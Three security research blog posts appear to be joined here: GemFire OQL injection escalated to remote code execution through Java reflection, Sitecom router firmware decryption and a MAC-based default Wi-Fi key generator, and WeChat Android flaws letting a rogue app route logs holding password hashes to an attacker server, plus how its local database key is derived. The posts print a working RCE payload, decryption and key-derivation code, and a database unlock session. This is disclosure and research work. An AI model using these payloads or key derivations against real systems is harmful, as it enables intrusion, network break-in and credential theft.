GemFire: From OQLi to RCE through reflection

Authors: Aristide Fattori (@joystick), Alessandro Di Pinto (@adipinto), Enrico Milanese (@ilmila)

During a penetration testing activity on one of our customers, we had to assess the security of some web services that interacted with an underlying GemFire database. GemFire is an in-memory distributed data management platform providing dynamic scalability, high performance, and database-like persistence.

During the analyses, we identified a straight injection vulnerability that could be easily exploited to dump data out of GemFire. However, this was not challenging enough, so we investigated if it could be further leveraged to escalate from a common ' OR '1'='1'-- injection to a juicer remote code execution.

Pivotal GemFire

GemFire offers a language OQL (Object Query Language) quite similar to SQL, with some limitations [1]. OQL injections are also very similar to classical SQL injections, they just require some care when crafting the attack, as many keywords are reserved for future use and not yet implemented (such as UNION). While skimming through the documentation, however, we stumbled upon a very interesting feature:

Invoking methods with parameters 
SELECT DISTINCT * FROM /exampleRegion p WHERE p.name.startsWith('Bo')

It is possible to invoke java methods on objects returned by OQL queries directly inside statements. While very useful for legitimate users, this is also an extremely dangerous feature. Indeed, through some hacks and with some limitations, it is possible to execute arbitrary java code, and even arbitrary commands.

Exploit

We will use an example to illustrate the exploit. Consider the following vulnerable query:

query = "SELECT DISTINCT * FROM /tab p WHERE p.name = '" + name + "'";

where 'name' is an attacker-controlled value. Our goal is to execute arbitrary commands on the victim machine, and in Java the fastest way to do that is:

Runtime.getRuntime().exec(command);

Unfortunately, Runtime did not appear to be already imported, nor we could use its full binary name inside the query. However, thanks to Java reflection API [2] we can easily overcome the problem and build this equivalent payload:

p.name.getClass().forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(p.name.value.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null,null), 'command'.split('asd'))

Analyzing the payload, for those not familiar with reflection, the first step is:

getClass().forName('java.lang.Runtime')

and causes the class loader to load class Runtime. It is impossible to directly instantiate an object of this class; rather, you need to invoke the static method getRuntime() to obtain an instance. Method getDeclaredMethods() returns an array containing each Method declared in the class. It is possible to list them with a small snippet of code:

int i = 0; 
for(java.lang.reflect.Method m : "".getClass().forName("java.lang.Runtime").getDeclaredMethods()) {
  System.out.println(i++ + " " + m); 
}

In this case, we are interested in methods 7 and 15:

... 
7 public static java.lang.Runtime java.lang.Runtime.getRuntime() 
... 
15 public java.lang.Process java.lang.Runtime.exec(java.lang.String) throws java.io.IOException 
...

However, beware that these indexes may vary according to the JDK that is used on the victim machine, so be sure to compile and run the snippet above with a matching JDK. If you are not sure which indexes to use, you can leverage reflection to discover them, by building an injection vector such as:

name = "123456789' OR p.name.value.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].getName() = 'getRuntime'--

which will return true if method with index 7 is indeed getRuntime().

To invoke a method through reflection, we use Method.invoke(). Since getRuntime() is static and does not want any parameter, we can pass just null to both arguments of invoke().

// Equivalent to: Runtime.getRuntime()
p.name.value.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null,null) 

Our local java environment also accepted invoke() with just one null parameter, but this triggered an exception while trying to invoke it inside the OQL query. This is most likely due to the fact that the query processor of GemFire was unable to resolve the method and thus raised an exception.

Then, we must invoke exec() on the obtained Runtime instance, thus we leverage once again the invoke() method, but this time its first parameter will be the object returned by the piece of code to invoke getRuntime():

// Equivalent to: Runtime.getRuntime.exec(COMMAND)
p.name.getClass().forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(p.name.value.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null,null), COMMAND) 

The final note is on COMMAND. There are many overloaded exec() methods in class Runtime, we use the simplest one that just takes the command to be executed as a String. However, to pass a String parameter to exec() through invoke(), we must pass an Object array with one element (i.e., the command String). We were not able to create an array inline with the standard java syntax. Thus, we leveraged an hack: calling split('asd') on a string which does not contain 'asd' will return an array of String with the string as the first and only element:

// Returns: {'command'}
'command'.split('asd') 

Thus, we get to the final payload:

p.name.getClass().forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(p.name.value.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null,null), 'command'.split('asd'))

As a final note, in our Java environment (both openjdk-7-jdk and the official Oracle version), the second argument of invoke() can be directly a String (rather than array). This did not work inside GemFire, probably for the same reason described above.

Conclusions

Java Reflection based exploits are not novel, but always dangerous. For example, the Jboss SEAM framework was affected by a vulnerability that was exploited with a payload similar to the one we used in this case [3].

References

[1] http://community.gemstone.com/display/gemfire/Querying - Gemfire OQL
[2] http://docs.oracle.com/javase/tutorial/reflect/ - Java Reflection API
[3] CVE-2010-1871 - Jboss SEAM Remote Command Execution

Sitecom firmware encryption and wireless keys

Authors: Roberto Paleari (@rpaleari) and Alessandro Di Pinto (@adipinto)

Last year we blogged about multiple security issues affecting Sitecom device models WLM-3500 and WLM-5500. One of these issues allowed attackers to obtain the default wireless passphrase of a vulnerable device in a "single shot", as the wireless key was derived from the device MAC address using an algorithm included inside the device firmware. This is a very serious issue, as many users never change the default Wi-Fi passphrase and keep using the one set by the device manufacturer.

We recently had the opportunity to analyze some other Sitecom routers, more precisely models WLR-4000 and WLR-4004. We were first attracted by this models due to the introduction of some mechanism to encrypt the firmware image distributed through Sitecom web site. To make a long story short, we soon realized the encryption layer could be easily circumvented; in addition, these routers were affected by the very same issue concerning the wireless passphrase: also for these models the key is derived from the MAC address, thus attackers can easily generate the default wireless key and access the LAN of a victim user.

Analysis of the firmware layout

In the following we briefly describe the analysis of the WLR-4004 firmware image (v1.23), but WLR-4000 differs only in minor details.

As a first step, to analyze an embedded device we typically try to download the firmware (when available) and inspect its contents. With WLR-4000/WLR-4004 devices we were lucky enough to find the firmware image on Sitecom web site. However, a preliminary analysis of the firmware  using binwalk provided no information about its internal structure:

$ binwalk 4004-FW-V1-23.bin
DECIMAL       HEX           DESCRIPTION
---------------------------------------------
$

This can be a symptom of a weird image format or, more often, an encrypted/obfuscated firmware. After we gave a quick look at the file entropy, we started to opt for the latter hypothesis. As an example, consider the low-entropy areas around 1.4MB and at the very end of the file:

File entropy for the WLR-4004 firmware image

A closer look to these regions provided some clues about the actual structure of the firmware image. As can be seen from the hex dump below, the final low-entropy area is due to the very same 8-byte sequence (88 44 a2 d1 68 b4 5a 2d, highlighted in red) that repeats until the end of the file.

$ dd if=4004-FW-V1-23.bin bs=$((0x0339720)) skip=1 | xxd | head
0000000: 00c6 ece0 c8f2 402e bdaa db83 d91d d987  ......@.........
0000010: b47d 4da1 987d 0f0d d64f 901a a6ae 056a  .}M..}...O.....j
0000020: 6d68 0219 3648 7980 4073 c849 ee04 5a2d  [email protected]
0000030: ef9c ae4f 68b5 f52f 104c a2d1 1d08 620a  ...Oh../.L....b.
0000040: b674 af5a 6ab4 5a2d 8845 fb8b fe71 472d  .t.Zj.Z-.E...qG-
0000050: 8844 a2d1 6c34 5a2d 8844 5617 75b4 5a2d  .D..l4Z-.DV.u.Z-
0000060: 8844 a2d1 68b4 5a2d 8844 a2d1 68b4 5a2d  .D..h.Z-.D..h.Z-
0000070: 8844 a2d1 68b4 5a2d 8844 a2d1 68b4 5a2d  .D..h.Z-.D..h.Z-
0000080: 8844 a2d1 68b4 5a2d 8844 a2d1 68b4 5a2d  .D..h.Z-.D..h.Z-
0000090: 8844 a2d1 68b4 5a2d 8844 a2d1 68b4 5a2d  .D..h.Z-.D..h.Z-
...

In an unencrypted firmware, the final bytes of the image are often used for padding and are thus initialized to zero (or to 0xff). But assuming our Sitecom firmware has been encrypted using some standard scheme, which algorithm would produce such a recurring pattern?

Our first attempt was to try with a basic XOR encryption, assuming a 8-byte key equal to byte sequence we observed before. The following Python snippet reads the encrypted image from standard input, performs the XOR and writes the result to standard output.

Firmware decryption routine for WLM-4004 images

After decrypting the firmware image we tried again to use binwalk to analyze the firmware. The results confirmed our hypothesis about a XOR algorithm being used to cipher the image: this time binwalk identified all the main components of a standard firmware image, including the kernel image (at offset 0xc0) and the root file system (offset 0x15d080).

$ cat 4004-FW-V1-23.bin | python decrypt.py > decrypted.bin
$ binwalk decrypted.bin

DECIMAL       HEX           DESCRIPTION
----------------------------------------------------------------------------------------
128           0x80          uImage header, header size: 64 bytes, header CRC: 0xAAB37DFB, created: Wed Jan 15 06:15:01 2014, ...
192           0xC0          LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 4240232 bytes
1429632       0x15D080      Squashfs filesystem, little endian, version 4.0, compression:  size: 1951490 bytes,  131 inodes, blocksize: 131072 bytes, created: Wed Jan 15 06:14:03 2014

 

Generation of the wireless key

We were finally able to analyze the contents of the firmware image (and, in particular, of the root file system) to search for any evidence of the wireless key generation algorithm. We were soon attracted by a rather "suspect" function exported by a shared library named libdbox.so; the function itself was named generate_wpa2_key_based_on_mac(). And yes, as you can probably imagine this is exactly the function we were looking for :-)

Function generate_wpa2_key_based_on_mac(), exported by libdbox.so

Similarly to the algorithm we found in WLM devices last year, the scheme used in WLR routers is also based on "scrambling" the MAC address and apply some character substitutions leveraging a hard-coded charset. The WLR-4000 and WLR-4004 only differ in the actual charset being used. More in detail, the algorithm is sketched out in the next figure.

A fragment of the key generation algorithm

As usual, we wrote a Python script that implements the attack (available here). The script receives in input the MAC address of the vulnerable Wi-Fi network and the router model name ("4000" for WLR-4000 and "4004" for WLR-4004) and generates the corresponding Wi-Fi key. A usage example is shown below.

$ python wlr-genpsk.py -m 4000 aa:bb:cc:dd:ee:ff
MAC:  aa:bb:cc:dd:ee:ff
SSID: SitecomDDEEFF
WPA:  ND68V8QLC6VS

$ python wlr-genpsk.py -m 4004 aa:bb:cc:dd:ee:ff
MAC:  aa:bb:cc:dd:ee:ff
SSID: SitecomDDEEFF
WPA:  C3N8VQEA2NVG 

Conclusions

Is not so uncommon for embedded device makers to rely on some obscure, and often custom-made, algorithms in order to generate secrets (e.g., Wi-Fi keys, admin passwords) starting from public details (e.g., MAC addresses, wireless SSID). Such approaches are quite handy for testing, debugging and manufacturing purposes. Even if it could be a very bad security practice, as long as the algorithm is sufficiently robust and is not leaked, no big issues arise.

However, in this blog post we shown how things can change when developers "forget" to remove an implementation of the algorithm from the final version of the device firmware: in these cases, it is just a matter of time until the code is found, analyzed and a key generator is developed, even when the device firmware image is "protected" by some obfuscation or encryption scheme.

A look at WeChat security

Author: Roberto Paleari (@rpaleari)

TL;DR: Any (unprivileged) application installed on an Android phone can instruct WeChat to send an hash of your password to an external, attacker-controlled server. If you are a WeChat user, it is probably worth reading the rest of this post :-)

Introduction

Nowadays, instant messaging (IM) has become one of the main applications of mobile phones, with plenty of "apps" available and literally billions of messages exchanged every day. With the widespread diffusion of mobile Internet traffic plans, IM applications are rapidly replacing other forms of mobile communication, such as text messages and, in some situations, even e-mails.

As conversations are rapidly converging to IM applications, it is natural to start asking how secure this communication channel actually is, and if users can really trust IM apps and their back-end infrastructure. We decided to pick one of these applications and look "under the hood", in order to see how the developers tried to ensure the confidentiality of in-transit communications.

After a quick survey of available IM applications, we decided to start with WeChat, a popular mobile IM platform developed by the China-based Tencent company. The choice of this specific application was quite arbitrary and mainly based on the fact that, in this period, WeChat is publicized a lot on the Italian TV.

WeChat is a feature-rich and sophisticated mobile application, which allows users to communicate via text messages, voice calls, to share photos and videos, and much more. The app is available for several mobile platforms, but we focused on the Android version only: according to Google Play, WeChat for Android alone has more than 50 million downloads. Most of the issues discussed in this post should affect Android versions of WeChat up to 4.5.1. On August 5th, 2013, Tencent released version 5.0, which introduced some major changes; we still have to analyze this version in detail.

A glimpse at the network traffic

The most obvious and easy thing to start with was an analysis of the network traffic generated by the application during normal usage. At this aim, we instructed our Android emulator to save all network traffic to file, we installed WeChat, we logged in and sent a couple of text messages. Part of the traffic generated by WeChat is shown below.

As can be seen from the figure, most of the traffic travels on TCP port 8080, typically reserved for HTTP connections (previous versions of WeChat were using the standard HTTPS port, tcp/443). However, at a first sight, the payload of these packets looks quite strange; indeed, Wireshark is not even able to dissect the HTTP payload.

Looking more closely, we noticed WeChat developers implemented a custom communication protocol: we were able to recognize an initial packet header, right at the beginning of the payload, that confirms these are actually not HTTP/HTTPS sessions. More precisely, we identified the following header fields:

• Packet length (4 bytes)
• Header length (2 bytes, always equal to 0x0010)
• Protocol version (2 bytes, always equal to 0x0001)
• Opcode (4 bytes, specifies the actual command encapsulated in this packet)
• Sequence number (4 bytes)

This initial header is followed by an opcode-dependent message body, usually in encrypted form. Briefly, the first message is encrypted by the application using RSA, with an hard-coded public key; next messages are encrypted in AES. In WeChat versions up to 4.3.5 we identified several vulnerabilities which allow an attacker who can intercept the traffic to quickly decrypt the message body, thus being able to access the messages sent and received by the user. More recent versions seems to be immune to these attacks, but we still have to perform a more in-depth analysis of the encryption scheme implemented in the latest WeChat releases.

Debugging

Here we come to the interesting part :-) WeChat includes an undocumented debugging infrastructure, probably used by developers for testing purposes. However, this infrastructure can also be abused by attackers to steal sensitive information concerning a WeChat user account.

In detail, WeChat reads debug settings from an Android ContentProvider, identified by URI "com.tencent.mm.coolassist.debugprovider/config". This ContentProvider is used by the application as a centralized source of debug configuration parameters, and can be employed to specify which debug messages should be logged to the Android console (adb logcat), to save log messages to the sdcard, and even configure a remote logger.

From a security perspective, the remote logging feature is surely the most interesting one. By exploiting this functionality, an attacker can develop a malicious application which exposes the aforementioned ContentProvider and, through specially-crafted debug settings, makes WeChat to send logs to an external, attacker-controlled, server. Such a malicious application would not require any special Android permission.

It is worth considering that logged messages disclose sensitive information about the users, including the user ID, password hash and other details. As an example, here is an excerpt from a remote log session:

09-09 14:32:51 594 V/MicroMsg.MMBuiltInIP <-- data-blogger-escaped-br="" data-blogger-escaped-dump="" data-blogger-escaped-end="" data-blogger-escaped-mmbuiltinip=""> 09-09 14:32:51 626 D/MicroMsg.AccInfo update session info: session=, uin=-1893467821
09-09 14:32:51 635 I/MicroMsg.AutoAuth sending remote request, network.active=false
09-09 14:32:51 666 I/MicroMsg.AutoAuth.SceneInfoQueue inQueue: netid=0
09-09 14:32:51 691 V/MicroMsg.SDK.SyncTask sync task done, return=0, cost=56(wait=0, run=56)
09-09 14:32:51 783 V/MicroMsg.NetStatWatchDog dkreport status:9999002 nowCount:1 ret:1
09-09 14:32:51 810 D/MicroMsg.AutoAuth account info updated:AccInfo:
|-uin =-1893467821
|-user =ukcd_ao03gex3y2731v
|-session =
|-pass =5f4dcc3b5aa765d61d8327deb882cf99
|-pass2 =5f4dcc3b5aa765d61d8327deb882cf99
`-cookie =(null)
09-09 14:32:51 885 D/MicroMsg.NetStatWatchDog item.toByteArray() :433
09-09 14:32:52 101 D/MicroMsg.GYNet encoding, type=380, key=, time=284
09-09 14:32:52 108 I/MicroMsg.GYNet sendImp reqData.len:866
09-09 14:32:52 114 D/MicroMsg.NetStatusUtil activeNetInfo extra=internet, type=0

As can be seen from these logs, the application forwards to the remote server the user name (ukcd_ao03gex3y2731v), another user identifier (uin, with value -1893467821), and even the user's password hash (5f4dcc3b5aa765d61d8327deb882cf99). It should be noted the hash value is a plain MD5 of the user's password, sent to the server for the authentication. Obviously some parameters in the above logs have been edited to prevent readers from hacking our account but, yes, 5f4dcc3b5aa765d61d8327deb882cf99 is the MD5 for string "password" and this was really our account's password :-)

The next section details the communication protocol used by WeChat to interact with the remote log server.

Remote logging protocol

Remote logging can be enabled by configuring the following debug keys:

• .com.tencent.mm.debug.log.level = 0
• .com.tencent.mm.debug.log.mmlog.url.mm.log = <ip1>:<port1>
• .com.tencent.mm.debug.log.mmlog.url.push.log = <ip2>:<port2>

The first key defines the log level ("0" simply means to log everything), while others are used to set the log server address for the two main WeChat application modules (mm and push).

WeChat developers implemented a trivial key derivation scheme to allow the application and the remote log server to agree on an encryption key to cipher debug logs. In a nutshell, the app reads three ASCII lines from the server and uses these lines to derive a DES key. Before transmitting debug messages, the application encrypts them in DES/ECB using this key.

The key generation function is implemented by the following Python code snippet. Function generatekey() receives in input the three lines sent by the server and returns the corresponding DES key.

import hashlib
 
def mangle(data):
    charset = "0123456789abcdef"
    r = ""
    for c in hashlib.md5(data).digest():
        r += charset[(ord(c) >> 4) & 0xf]
        r += charset[ord(c) & 0xf]
    return r

def generatekey(line0, line1, line2):
    seed = line1[2:]
    seed += str(int(line2[2:]))
    seed += "dfdhgc"
    key = mangle(seed)[7:21]
    return key

We also implemented a buggy "quick & dirty" Python script that listens for incoming connections, sends out three ASCII lines, computes the key and deciphers incoming messages. The script is available here.

As a final note, we would like to point out that the ".com.tencent.mm.debug.log.mmlog.url.* " configuration keys are not supported by the latest version of WeChat (5.0). However, this version still queries the ContentProvider for debug settings and part of the logging functionalities have been moved to a dedicated JNI library. We plan to investigate these new features in the future, so at the moment we cannot exclude that the remote logging mechanism has simply been moved elsewhere.

Local database encryption

WeChat locally stores application data in an encrypted SQLite database named "EnMicroMsg.db". This database is located in the "MicroMsg" subfolder inside the application's data directory (typically something like "/data/data/com.tencent.mm").

The database is encrypted using SQLCipher, an open source extension for SQLite that provides full database encryption. The encryption password is derived from the "uin" parameter (see previous sections) combined with the device identifier through a custom function. More precisely, the key generation function leverages the mangle() function shown in the previous Python snippet. The actual database encryption key can be generated through the following pseudo-code:

password = mangle(deviceid + uin)[:7]

Here deviceid is the value returned by the Android API function TelephonyManager.getDeviceId(). Follows a sample SQLCipher console session that demonstrate how the EnMicroMsg.db database can be decrypted.

$ sqlcipher EnMicroMsg.db
sqlite> PRAGMA key = 'b60c8e4';
sqlite> PRAGMA cipher_use_hmac = OFF;
sqlite> .schema
CREATE TABLE conversation (unReadCount INTEGER, status INT, ...
CREATE TABLE bottleconversation (unReadCount INTEGER, status INT, ...
CREATE TABLE tcontact (username text PRIMARY KEY, extupdateseq long, ...
...

It is also worth pointing out that, as the key generation algorithm truncates the password to 7 hex characters, it would be not so difficult for motivated attackers who are able to get the encrypted database to brute force the key, even without knowing the uin or the device identifier.

Conclusions

In this post we discussed some security weaknesses that affect Android versions of WeChat up to 4.5.1 (and possibly others). We tried to contact developers to notify our findings, but with no luck: we wrote an e-mail to Tencent technical support both on August 30th and on September 3th, but we got no reply. With the recent widespread diffusion of mobile instant messaging, app developers should take security into more serious considerations, as their application will probably rapidly become an attractive target for attackers.